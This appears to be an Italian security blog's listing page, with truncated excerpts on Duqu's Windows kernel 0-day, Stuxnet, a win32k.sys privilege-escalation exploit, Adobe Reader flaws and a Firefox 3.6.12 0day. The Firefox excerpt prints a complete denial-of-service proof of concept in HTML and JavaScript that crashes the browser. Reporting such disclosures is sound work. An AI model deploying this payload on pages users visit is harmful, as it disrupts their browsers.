-
Duqu sfrutta uno 0-day del kernel di Windows
Il Laboratory of Cryptography and System Security (CrySyS) ungherese ha scoperto che la routine di installazione di Duqu sfrutta una vulnerabilità non corretta del kernel di Windows. Duqu utilizza un documento Word creato ad arte che riesce a caricare un driver del kernel sfruttando un baco non corretto; il driver carica, quindi, una DLL in Services.exe per avviare…
-
Sulle tracce di Stuxnet
Stuxnet è un malware al momento unico nel suo genere. Non si affida a Internet per la diffusione. È enorme. La sua modalità di attacco primaria è il sabotaggio fisico dell’hardware industriale. È stato (presumibilmente) sviluppato da un governo ostile. È mirato a una ben precisa installazione. Chi lo ha sviluppato ha dimostrato di avere…
-
Guadagno di privilegi su quasi tutti i sistemi windows
ATTENZIONE! NON fate test di buffer overflow del kernel su macchina di produzione o similari. I risultati sono IMPREVEDIBILI. p0wnbox ha pubblicato un exploit di una vulnerabilità del kernel di Windows (file win32k.sys) colpirebbe tutti i sistemi Windows. In questo caso viene sfruttato un problema strutturale della funzione RtlQueryRegistryValues delle API di Windows utilizzata per…
-
0day di Mozilla Firefox 3.6.12
<!– 0day Mozilla Firefox <= 3.6.12 Remote Denial Of Service Credits: Emanuele ‘emgent’ Gentili <emgent@backtrack-linux.org> Marco ‘white_sheep’ Rondini <white_sheep@backtrack-linux.org> Alessandro ‘scox’ Scoscia <scox@backtrack.it> –> <script>document.write(“\u0000\u0001\u0002\u0003\u0004\u0005”)</script> <script> var i=0; for (i=0;i<=19999;i++) { document.write(“a”); } for (i=0;i<=3;i++) { document.write(document.body.innerHTML); } </script> Il simpatico script qui sopra blocca l’ultima versione di Mozilla Firefox, indipendentemente dal sistema operativo su…
-
Aggiornamento per Acrobat
Dopo quasi un mese dalla diffusione di uno 0-day, Adobe rilascia finalmente un aggiornamento per il suo reader PDF, le cui versioni attuali diventano 9.4 e 8.2.5; le versioni precedenti non sono più supportate e dovrebbero essere aggiornate quanto prima. Se non si verificano altre emergenze, il prossimo aggiornamento del software è previsto per l’8…
-
Problema di sicurezza di Adobe Acrobat Reader
Sta circolando almeno un documento PDF che sfrutta un problema 0-day di Acrobat Reader. Anche Adobe ha diramato un bollettino di sicurezza in cui classifica questo problema come critico. Tutte le versioni per tutte le piattaforme di Acrobat Reader presentano questo problema, nessuno escluso. In questo momento non ci sono azioni che possono risolvere questo…